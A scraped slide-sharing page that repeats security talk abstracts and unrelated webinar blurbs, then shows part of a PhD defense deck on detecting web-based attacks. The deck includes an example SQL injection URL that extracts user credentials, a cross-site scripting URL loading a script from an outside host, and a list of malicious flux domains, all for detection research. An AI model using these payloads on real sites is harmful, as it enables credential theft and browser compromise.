- Introduction to Web Security
- Why Is Security So Important?
- Web Security Considerations
- Web Security Approaches
- Secure Socket Layer (SSL) and Transport Layer Security (TLS)
- Secure Electronic Transaction (SET)
- Recommended Reading
- Problems
Paper: A Solution for the Automated Detection of Clickjacking AttacksMarco Balduzzi
Clickjacking is a web-based attack that has recently received a wide media coverage. In a clickjacking attack, a malicious page is constructed such that it tricks victims into clicking on an element of a different page that is only barely (or not at all) visible. By stealing the victim's clicks, an attacker could force the user to perform an unintended action that is advantageous for the attacker (e.g., initiate an online money transaction). Although clickjacking has been the subject of many discussions and alarming reports, it is currently unclear to what extent clickjacking is being used by attackers in the wild, and how significant the attack is for the security of Internet users. In this paper, we propose a novel solution for the automated and efficient detection of clickjacking attacks. We describe the system that we designed, implemented and deployed to analyze over a million unique web pages. The experiments show that our approach is feasible in practice. Also, the empirical study that we conducted on a large number of popular websites suggests that clickjacking has not yet been largely adopted by attackers on the Internet.
Social enigneering (Security) is the new threat and its growing day by day specially in India and its sub contenents. this presentation is all aout social engineering threat and some tips to prevent from this attack.
- Introduction to Web Security
- Why Is Security So Important?
- Web Security Considerations
- Web Security Approaches
- Secure Socket Layer (SSL) and Transport Layer Security (TLS)
- Secure Electronic Transaction (SET)
- Recommended Reading
- Problems
Paper: A Solution for the Automated Detection of Clickjacking AttacksMarco Balduzzi
Clickjacking is a web-based attack that has recently received a wide media coverage. In a clickjacking attack, a malicious page is constructed such that it tricks victims into clicking on an element of a different page that is only barely (or not at all) visible. By stealing the victim's clicks, an attacker could force the user to perform an unintended action that is advantageous for the attacker (e.g., initiate an online money transaction). Although clickjacking has been the subject of many discussions and alarming reports, it is currently unclear to what extent clickjacking is being used by attackers in the wild, and how significant the attack is for the security of Internet users. In this paper, we propose a novel solution for the automated and efficient detection of clickjacking attacks. We describe the system that we designed, implemented and deployed to analyze over a million unique web pages. The experiments show that our approach is feasible in practice. Also, the empirical study that we conducted on a large number of popular websites suggests that clickjacking has not yet been largely adopted by attackers on the Internet.
Social enigneering (Security) is the new threat and its growing day by day specially in India and its sub contenents. this presentation is all aout social engineering threat and some tips to prevent from this attack.
How To Protect Your Website From Bot Attacks is a one-hour continuing education course. After successfully completing the course and final exam, you will be awarded a certificate of completion that you can use towards fulfilling your continuing education requirements.
"How To Defeat Advanced Malware: New Tools for Protection and Forensics" is a FREE continuing education class that has been designed specifically for CIO's, CTO's, CISO's and senior executives who work within the financial industry and are responsible for their company's endpoint protection.
The top two attack vectors for malware are email and web browsers. Watering-hole attacks conceal malware on member-based sites and phishing scams can target individuals with personal details. This PPT describes a different security approach to protect against these threats while achieving business growth, efficiency and lowered expenses. The presentation features Cisco Email, Web and Cloud Web Security and covers basic features, offers, benefits, newest features and product integrations. Watch the webinar: http://cs.co/9004BGqvy
In a confusing web world of "Like" buttons, tweets, Instagram'ing, and files being stored in clouds like Dropbox, organizations are challenged with how to protect the network, while not hindering business. To make matters worse, vendors are confusing the deployment methods by introducing On Premise Web Security Gateways, Cloud Web Security Gateways and Next Generation Firewalls.
Puppetnets and Botnets: Information Technology Vulnerability Exploitsecarrow
The focus of this paper is to identify dominant trends of
information security threats to the Internet 2001 to 2007. This
paper is intended to provide an understanding of the new
emphasis of attacks through use of robotic networks and how
some users and organizations are already preparing a response
using innovative visualization techniques in conjunction with
traditional methods. The scope of research will focus on basic
enterprise level services that are commonly provided by various
corporations; e.g., e-mail, browser applications, wireless and
mobile devices, IP telephony, and online banking. The research
will first review the network infrastructure common to most
corporate organizations and assume basic enterprise components
and functionality in response to the current security threats. The
second emphasis will consider the impact of malware robotic
networks (Botnets and Puppetnets) on the corporate network
infrastructure and how to address these threats with new and
innovative techniques. This approach is pragmatic in application
and focuses on assimilation of existing data to present a
functional rationale of attacks to anticipate and prepare for this
coming year.
We are delighted to have Gary Miliefsky on our second Hacker Hotshot of 2013! Gary is the Editor of Cyber Defense Magazine, which he recently founded after years of being a cover story author and regular contributor to Hakin9 Magazine. In partnership with UMASS, he started the Cyber Defense Test Labs to perform independent lab reviews of next generation information security products. Gary is also the founder of NetClarity, Inc., which is the world's first next generation agentless, non-inline network access control (NAC) and bring your own device (BYOD) management appliances vendor based on a patented technology which he invented.
The rise of malware on the web is threatening businesses around the world. This presentation looks at the trends in malware on the web, and how AppRiver is providing protection against this threat.
What are the Botnets? Description of what are botnets and how they works. what are the known botnet attacks.and architecture of botnets. slides also describes some prevention steps from botnet attack.
Anticipate and Prevent Cyber Attack Scenarios, Before They OccurSkybox Security
Presented at ISSA Cornerstones of Trust June 6, 2012.
No one wants to be the next cyber casualty. Collectively, organizations spend an enormous amount of resources deploying and managing security solutions to block malware, protect data, and keep critical business services operating.
Yet most organizations remain inadequately protected against evolving and dangerous cyber threats. In this session, we will learn to recognize common network attack scenarios and mitigate the combination of misconfigurations, vulnerabilities, access policy violations and other security gaps that can be exploited by sophisticated attackers.
High-profile breaches at Epsilon, Sony, and other enterprise and government networks have dominated the news lately, raising awareness of the need to design effective security strategies against sophisticated attacks and advanced persistent threats (APTs). Many companies struggle with where to begin to develop an effective plan of cyber defense.
During this session we will walk the audience through several attack scenarios using a visual attack explorer tool, highlighting the combination of security gaps that are often used and how to prevent them. Network modeling, vulnerability analysis, access path analysis, and attack simulation will all be introduced and we will show how these analytical tools can be used to quickly and automatically find exposed areas of a network.
How To Protect Your Website From Bot Attacks is a one-hour continuing education course. After successfully completing the course and final exam, you will be awarded a certificate of completion that you can use towards fulfilling your continuing education requirements.
"How To Defeat Advanced Malware: New Tools for Protection and Forensics" is a FREE continuing education class that has been designed specifically for CIO's, CTO's, CISO's and senior executives who work within the financial industry and are responsible for their company's endpoint protection.
The top two attack vectors for malware are email and web browsers. Watering-hole attacks conceal malware on member-based sites and phishing scams can target individuals with personal details. This PPT describes a different security approach to protect against these threats while achieving business growth, efficiency and lowered expenses. The presentation features Cisco Email, Web and Cloud Web Security and covers basic features, offers, benefits, newest features and product integrations. Watch the webinar: http://cs.co/9004BGqvy
In a confusing web world of "Like" buttons, tweets, Instagram'ing, and files being stored in clouds like Dropbox, organizations are challenged with how to protect the network, while not hindering business. To make matters worse, vendors are confusing the deployment methods by introducing On Premise Web Security Gateways, Cloud Web Security Gateways and Next Generation Firewalls.
Puppetnets and Botnets: Information Technology Vulnerability Exploitsecarrow
The focus of this paper is to identify dominant trends of
information security threats to the Internet 2001 to 2007. This
paper is intended to provide an understanding of the new
emphasis of attacks through use of robotic networks and how
some users and organizations are already preparing a response
using innovative visualization techniques in conjunction with
traditional methods. The scope of research will focus on basic
enterprise level services that are commonly provided by various
corporations; e.g., e-mail, browser applications, wireless and
mobile devices, IP telephony, and online banking. The research
will first review the network infrastructure common to most
corporate organizations and assume basic enterprise components
and functionality in response to the current security threats. The
second emphasis will consider the impact of malware robotic
networks (Botnets and Puppetnets) on the corporate network
infrastructure and how to address these threats with new and
innovative techniques. This approach is pragmatic in application
and focuses on assimilation of existing data to present a
functional rationale of attacks to anticipate and prepare for this
coming year.
We are delighted to have Gary Miliefsky on our second Hacker Hotshot of 2013! Gary is the Editor of Cyber Defense Magazine, which he recently founded after years of being a cover story author and regular contributor to Hakin9 Magazine. In partnership with UMASS, he started the Cyber Defense Test Labs to perform independent lab reviews of next generation information security products. Gary is also the founder of NetClarity, Inc., which is the world's first next generation agentless, non-inline network access control (NAC) and bring your own device (BYOD) management appliances vendor based on a patented technology which he invented.
The rise of malware on the web is threatening businesses around the world. This presentation looks at the trends in malware on the web, and how AppRiver is providing protection against this threat.
What are the Botnets? Description of what are botnets and how they works. what are the known botnet attacks.and architecture of botnets. slides also describes some prevention steps from botnet attack.
Anticipate and Prevent Cyber Attack Scenarios, Before They OccurSkybox Security
Presented at ISSA Cornerstones of Trust June 6, 2012.
No one wants to be the next cyber casualty. Collectively, organizations spend an enormous amount of resources deploying and managing security solutions to block malware, protect data, and keep critical business services operating.
Yet most organizations remain inadequately protected against evolving and dangerous cyber threats. In this session, we will learn to recognize common network attack scenarios and mitigate the combination of misconfigurations, vulnerabilities, access policy violations and other security gaps that can be exploited by sophisticated attackers.
High-profile breaches at Epsilon, Sony, and other enterprise and government networks have dominated the news lately, raising awareness of the need to design effective security strategies against sophisticated attacks and advanced persistent threats (APTs). Many companies struggle with where to begin to develop an effective plan of cyber defense.
During this session we will walk the audience through several attack scenarios using a visual attack explorer tool, highlighting the combination of security gaps that are often used and how to prevent them. Network modeling, vulnerability analysis, access path analysis, and attack simulation will all be introduced and we will show how these analytical tools can be used to quickly and automatically find exposed areas of a network.
Fraud is a key--and evolving--challenge facing security teams today. This presentations highlight tactics organizations can deploy to dramatically reduce incidents of fraud, provides a high-level, technical overview of client-side attacks and demonstrates how man-in-the-browser attacks operate, reveals two techniques that can be used by a Web application to detect infected clients, and discusses practical aspects of implementing these two methods and how to use the output of the detection process in the application.
Since the advent of the Internet, cybersecurity has been handed new challenges due to the massively expanded accessibility and interconnectedness of the web. Where once security was considered to be dealt with in a multi-layered manner, now those layers are so fuzzy and expanded as to no longer exist.
By United Security Providers
Secure by design and secure software developmentBill Ross
This secure lifecycle management process (SLCMP said slickum) defines the basic and most realistic way to develop secure software. While the briefing is a bit dated slide 34 is still a very relevant process. What is below the green line is the security dynamic process that happens supporting the basic development process seen above the green line. SLCMP is supported by building a complementary and excellent information risk framework system security plan or IRASSP. SLCMP is operationally deployed.
IoT Malware Detection through Threshold Random WalksBiagio Botticelli
Presentation of my Master Thesis Project in Engineering in Computer Science of University of Rome "La Sapienza".
The thesis applies the Threshold Random Walk probabilistic algorithm to make an online detection of IoT Malware Families.
Wild Patterns: A Half-day Tutorial on Adversarial Machine Learning - 2019 Int...Pluribus One
Slides of the tutorial held by Battista Biggio, University of Cagliari and Pluribus One Srl, during "2019 International Summer School on Machine Learning and Security (MLS)"
Secure Kernel Machines against Evasion AttacksPluribus One
Authors: Paolo Russu, Ambra Demontis, Battista Biggio, Giorgio Fumera, and Fabio Roli (University of Cagliari, Italy).
Talk by Battista Biggio at AISec '16, co-located with CCS '16 in Vienna, Oct. 28 2016.
Battista Biggio @ ICML 2015 - "Is Feature Selection Secure against Training D...Pluribus One
Learning in adversarial settings is becoming an important task for application domains where attackers may inject malicious data into the training set to subvert normal operation of data-driven technologies. Feature selection has been widely used in machine learning for security applications to improve generalization and computational efficiency, although it is not clear whether its use may be beneficial or even counterproductive when training data are poisoned by intelligent attackers. In this work, we shed light on this issue by providing a framework to investigate the robustness of popular feature selection methods, including LASSO, ridge regression and the elastic net. Our results on malware detection show that feature selection methods can be significantly compromised under attack (we can reduce LASSO to almost random choices of feature sets by careful insertion of less than 5% poisoned training samples), highlighting the need for specific countermeasures.
Battista Biggio @ MCS 2015, June 29 - July 1, Guenzburg, Germany: "1.5-class ...Pluribus One
Pattern classifiers have been widely used in adversarial settings like spam and malware detection, although they have not been originally designed to cope with intelligent attackers that manipulate data at test time to evade detection.
While a number of adversary-aware learning algorithms have been proposed, they are computationally demanding and aim to counter specific kinds of adversarial data manipulation.
In this work, we overcome these limitations by proposing a multiple classifier system capable of improving security against evasion attacks at test time by learning a decision function that more tightly encloses the legitimate samples in feature space, without significantly compromising accuracy in the absence of attack. Since we combine a set of one-class and two-class classifiers to this end, we name our approach one-and-a-half-class (1.5C) classification. Our proposal is general and it can be used to improve the security of any classifier against evasion attacks at test time, as shown by the reported experiments on spam and malware detection.
Sparse Support Faces - Battista Biggio - Int'l Conf. Biometrics, ICB 2015, Ph...Pluribus One
Many modern face verification algorithms use a small set of reference templates to save memory and computa- tional resources. However, both the reference templates and the combination of the corresponding matching scores are heuristically chosen. In this paper, we propose a well- principled approach, named sparse support faces, that can outperform state-of-the-art methods both in terms of recog- nition accuracy and number of required face templates, by jointly learning an optimal combination of matching scores and the corresponding subset of face templates. For each client, our method learns a support vector machine using the given matching algorithm as the kernel function, and de- termines a set of reference templates, that we call support faces, corresponding to its support vectors. It then dras- tically reduces the number of templates, without affecting recognition accuracy, by learning a set of virtual faces as well-principled transformations of the initial support faces. The use of a very small set of support face templates makes the decisions of our approach also easily interpretable for designers and end users of the face verification system.
Battista Biggio, Invited Keynote @ AISec 2014 - On Learning and Recognition o...Pluribus One
Learning and recognition of secure patterns is a well-known problem in nature. Mimicry and camouflage are widely-spread techniques in the arms race between predators and preys. All of the information acquired by our senses is therefore not necessarily secure or reliable. In machine learning and pattern recognition systems, we have started investigating these issues only recently, with the goal of learning to discriminate between secure and hostile patterns. This phenomenon has been especially observed in the context of adversarial settings like biometric recognition, malware detection and spam filtering, in which data can be adversely manipulated by humans to undermine the outcomes of an automatic analysis. As current pattern recognition methods are not natively designed to deal with the intrinsic, adversarial nature of these problems, they exhibit specific vulnerabilities that an adversary may exploit either to mislead learning or to avoid detection. Identifying these vulnerabilities and analyzing the impact of the corresponding attacks on pattern classifiers is one of the main open issues in the novel research field of adversarial machine learning.
In the first part of this talk, I introduce a general framework that encompasses and unifies previous work in the field, allowing one to systematically evaluate classifier security against different, potential attacks. As an example of application of this framework, in the second part of the talk, I discuss evasion attacks, where malicious samples are manipulated at test time to avoid detection. I then show how carefully-designed poisoning attacks can mislead learning of support vector machines by manipulating a small fraction of their training data, and how to poison adaptive biometric verification systems to compromise the biometric templates (face images) of the enrolled clients. Finally, I briefly discuss our ongoing work on attacks against clustering algorithms, and sketch some possible future research directions.
Clustering algorithms have become a popular tool in computer security to analyze the behavior of malware variants, identify novel malware families, and generate signatures for antivirus systems.
However, the suitability of clustering algorithms for security-sensitive settings has been recently questioned by showing that they can be significantly compromised if an attacker can exercise some control over the input data.
In this paper, we revisit this problem by focusing on behavioral malware clustering approaches, and investigate whether and to what extent an attacker may be able to subvert these approaches through a careful injection of samples with poisoning behavior.
To this end, we present a case study on Malheur, an open-source tool for behavioral malware clustering. Our experiments not only demonstrate that this tool is vulnerable to poisoning attacks, but also that it can be significantly compromised even if the attacker can only inject a very small percentage of attacks into the input data. As a remedy, we discuss possible countermeasures and highlight the need for more secure clustering algorithms.
Battista Biggio @ AISec 2013 - Is Data Clustering in Adversarial Settings Sec...Pluribus One
Clustering algorithms have been increasingly adopted in security applications to spot dangerous or illicit activities.
However, they have not been originally devised to deal with deliberate attack attempts that may aim to subvert the clustering process itself. Whether clustering can be safely adopted in such settings remains thus questionable.
In this work we propose a general framework that allows one to identify potential attacks against clustering algorithms, and to evaluate their impact, by making specific assumptions on the adversary's goal, knowledge of the attacked system, and capabilities of manipulating the input data. We show that an attacker may significantly poison the whole clustering process by adding a relatively small percentage of attack samples to the input data, and that some attack samples may be obfuscated to be hidden within some existing clusters.
We present a case study on single-linkage hierarchical clustering, and report experiments on clustering of malware samples and handwritten digits.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Corona - Ph.D. Defense Slides
1. Detection of Web-based attacks
Detection of Web-based attacks
PhD Thesis - DIEE University of Cagliari, Italy
Igino Corona
March 4, 2010
2. Detection of Web-based attacks
1 Research outline
2 Current Internet Threats
World Wide Web
Common Gateway Interface
Client-side web security
Server-side web security
3 Our Contribution to Client-side Web Security
Flux Buster
4 Our Contribution to Server-side Web Security
Web Guardian
5 Research Contributions - summary
6 Limitations - summary
3. Detection of Web-based attacks
Research outline
Intrusion Detection and Adversarial Environment - critical
review
I. Corona, G. Giacinto, F. Roli, Intrusion detection in computer systems as a
pattern recognition task in adversarial environment: a critical review,
Workshop on Neural Information Processing Systems (NIPS), Whistler, British
Columbia, Canada, 08/12/2007
Detailed work on the PhD thesis (it is going to be submitted soon to an
important Journal)
Intrusion Detection and Multiple Classifier Systems
I. Corona, G. Giacinto, F. Roli, Intrusion Detection in Computer Systems
using Multiple Classifer Systems, Supervised and Unsupervised Ensemble
Methods and Their Applications, O. Okun and G. Valentini, no. 126:
Springer-Verlag, Berlin/Heidelberg, pp. 91-114, 2008
4. Detection of Web-based attacks
Research outline
Intrusion Detection and Information Fusion
I. Corona, G. Giacinto, C. Mazzariello, F. Roli, C. Sansone, Information fusion
for computer security: State of the art and open issues, Information Fusion,
vol. 10, pp. 274-284, 2009
Intrusion Detection and Web Security
I. Corona, D. Ariu, G. Giacinto , HMM-Web: a framework for the detection of
attacks against Web applications, IEEE ICC 2009, Dresden, Germany,
14/06/2009
HMM-Web → Web Guardian Detailed work on the PhD Thesis (it is going to be
submitted soon to a relevant conference)
R. Perdisci, I. Corona, D. Dagon, W. Lee, Detecting Malicious Flux Service
Networks through Passive Analysis of Recursive DNS Traces, Annual
Computer Security Applications Conference (ACSAC), Honolulu, Hawaii, USA,
07/12/2009
5. Detection of Web-based attacks
Current Internet Threats
World Wide Web
The weak point in the chain: World Wide Web
Nowadays, most of Internet threats are due to Web-based
vulnerabilities [SANS (2009), Cenzic (2009)]
easy business
information oppor-
sharing tunities
high
complex
applications World Wide Web exposition
of services
developers
strict time with little
development security
constraints training
6. Detection of Web-based attacks
Current Internet Threats
Common Gateway Interface
web browser Internet web server
7. Detection of Web-based attacks
Current Internet Threats
Common Gateway Interface
request
web browser Internet web server
8. Detection of Web-based attacks
Current Internet Threats
Common Gateway Interface
request request
web browser Internet web server
input query
CGI
web application
9. Detection of Web-based attacks
Current Internet Threats
Common Gateway Interface
request request
web browser Internet web server
input query content
CGI
web application
10. Detection of Web-based attacks
Current Internet Threats
Common Gateway Interface
response [content] response [content]
request request
web browser Internet web server
input query content
CGI
web application
11. Detection of Web-based attacks
Current Internet Threats
Client-side web security
web user (victim) attacker
[malicious content/scams]
web browser web server
Client-side problem: malicious (or infect) websites
Malicious websites routinely exploit vulnerabilities on browsers
(e.g. Internet Explorer, Firefox) and their plugins (e.g.
Javascript, Adobe Reader, Flash player) to execute arbitrary
(unauthorized) instructions at client-side. Compromised
computers may take part in a botnet. In addition, malicious
websites may support a wide range of scams (e.g. Phishing
scams, Fake Job proposals, Fake lotteries).
12. Detection of Web-based attacks
Current Internet Threats
Client-side web security
Malicious Fast Flux Networks
Malicious websites are increasingly hosted through malicious
Fast Flux Service Networks. These networks are composed by
malware infected computers that can be remotely controlled by
miscreants. Each computer typically acts as a HTTP proxy, i.e.
retrieve malicious content from a central node called
mothership. These illegal networks are very robust, pervasive
and inherently difficult to block.
18. Detection of Web-based attacks
Current Internet Threats
Server-side web security
attacker legitimate web service
malicious request
web browser web server
Server-side problem: malicious web requests
Legitimate web services are routinely compromised by
exploiting vulnerabilities on web servers and web applications.
For example, miscreants may steal confidential information or
inject malicious code on web pages, in order to attack users
that will further access to the web services.
19. Detection of Web-based attacks
Current Internet Threats
Server-side web security
Example: Joomla Hotel Booking System
Component
SQL Injection
http://www.vulnerablehotel.com/components/
com_hbssearch/longDesc.php?h_id=1&
id=-2%20union%20select%20concat%28username,
0x3a,password%29%20from%20jos_users--
Cross-site scripting
http://www.vulnerablehotel.com/index.php?
option=com_hbssearch&task=showhoteldetails&
id=118&adult=2<script%20src=http://www.dbrgf.ru
/script.js>
20. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Our Contribution to Client-side Web Security
Flux Buster
21. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Key observations
In large networks (i.e. serving millions of users), it is very likely that some users
will (unfortunately) fall victims of malicious web content, and will therefore “click”
on (and initiate DNS queries about) fast flux domain names.
Passive analysis of real users’ activities allows us to stealthily detect and collect
information about “popular” malicious flux networks on the Internet, regardless of
the method used by miscreants to advertise websites hosted through these
networks.
Thousands of new domain names per day. In general, during the time, so many
different (but equivalent) domain names may resolve to the same flux network.
Thus, an IP-based clustering of domain names is really useful to (a) identify the
relationship between domain names, (b) accurately characterize different fast
flux networks, (c) obtain a lower number of objects (domain clusters vs domains)
that must be classified.
22. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Passive RDNS data collection
23. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Architecture
24. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Architecture
Very conservative (but effective) prefiltering rules
F1: stateless rules, e.g. TTL ≥ 3 hours
F2: stateful rules, e.g. for each domain name resolved at least
100 times: (a) it is associated to only 5 (or less) distinct IP
addresses and (b) there is no DNS reply which returns more
than 2 new IP addresses.
25. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Preprocessing phase
26. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Preprocessing phase
↓ F1+F2
27. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Hierarchical single linkage Clustering
|R(α) ∩ R(β) | 1
sim(α, β) = ·
(α) ∪ R(β) | 1 + e γ−min(|R(α) |,|R(β)|)
∈ [0, 1]
|R
29. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Service Classifier
Cluster statistical features
Passive: φ1 Number of resolved IPs, φ2 Number of do-
mains, φ3 Avg. TTL per domain, φ4 Network
prefix diversity, φ5 Number of domains per net-
work, φ6 IP Growth Ratio
Active: φ7 Autonomous System (AS) diversity, φ8 BGP
prefix diversity, φ9 Organization diversity, φ10
Country Code diversity, φ11 Dynamic IP ratio,
φ12 Average Uptime Index.
30. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Service Classifier
Cluster ID Cluster Nickname Use Label
l1 cdne.gearsofwar.xbox.com CDN Legitimate
l2 fotf.cdnetworks.net CDN Legitimate
l3 3.europe.ntp.org NTP pool Legitimate
l4 opendht.nyuld.net OASIS Legitimate
m1 50b0f40526956b85.saidthesestory.com Adult Content/Malware Malicious Flux
m2 paypal.database-confirmation.com Phishing Malicious Flux
m3 hqdvrp.flagacai.com Pharmacy Scam Malicious Flux
l1 l2 l3 l4 m1 m2 m3
IP Growth Ratio (φ6 ) 0.028 0.016 0.039 0.021 0.932 0.374 0.56
Number of domains per network (φ5 ) 488 165 57 54 42000 228 1632
Avg. TTL per domain (φ3 ) 22 20 1402 7421 300 180 180
31. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Service Classifier
Labeled Dataset
Time Interval 1march / 14april 2009
Users Over 4 millions
DNS queries 2.5 · 109 per day
Candidate flux domains ∼ 105 per day
Domain Clusters ∼ 310 clusters per day1
Fast Flux Clusters ∼ 23 clusters per day
Fast Flux domain names 61,710
Flux Agents 17,332
1
We consider only clusters (networks) having at least 10 IP addresses
32. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Service Classifier
33. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Service Classifier - accuracy
Decision tree Accuracy - C4.5 algorithm -
5 fold cross validation: 60%training, 40%test
Features AUC DR FP
All 0.992 (0.003) 99.7% (0.36) 0.3% (0.36)
Passive 0.993 (0.005) 99.4% (0.53) 0.6% (0.53)
φ6 , φ3 , φ5 0.989 (0.006) 99.3% (0.49) 0.7% (0.49)
34. Detection of Web-based attacks
Our Contribution to Client-side Web Security
Flux Buster
Application - domain name Blacklisting
adult content
0711afafa7803d51.nugentcelticdonnell.com, 088683b12777d475.ghostsbarredrental.com,
08f15257a0ea7ee5.spreadnettingcleanly.com, 09ad518ad726e193.squadsvariousembryos.com,
09ae7f81efa7faa2.fraserlibraryshabby.com, 0a1a7c2792c461ed.nugentcelticdonnell.com,
0b53caa4e8a9edb5.fraserlibraryshabby.com, 0bc0dd7f7773c50c.nugentcelticdonnell.com,
0bfd3365dca2c45b.nugentcelticdonnell.com, 0c9328f675b1b931.ghostsbarredrental.com,
0d565d437fb5869d.ghostsbarredrental.com, 0d9d81f5e70761d2.squadsvariousembryos.com,
0dfde08e68ca8358.ghostsbarredrental.com, 0e294041c5d3d17c.developleftcity.com,
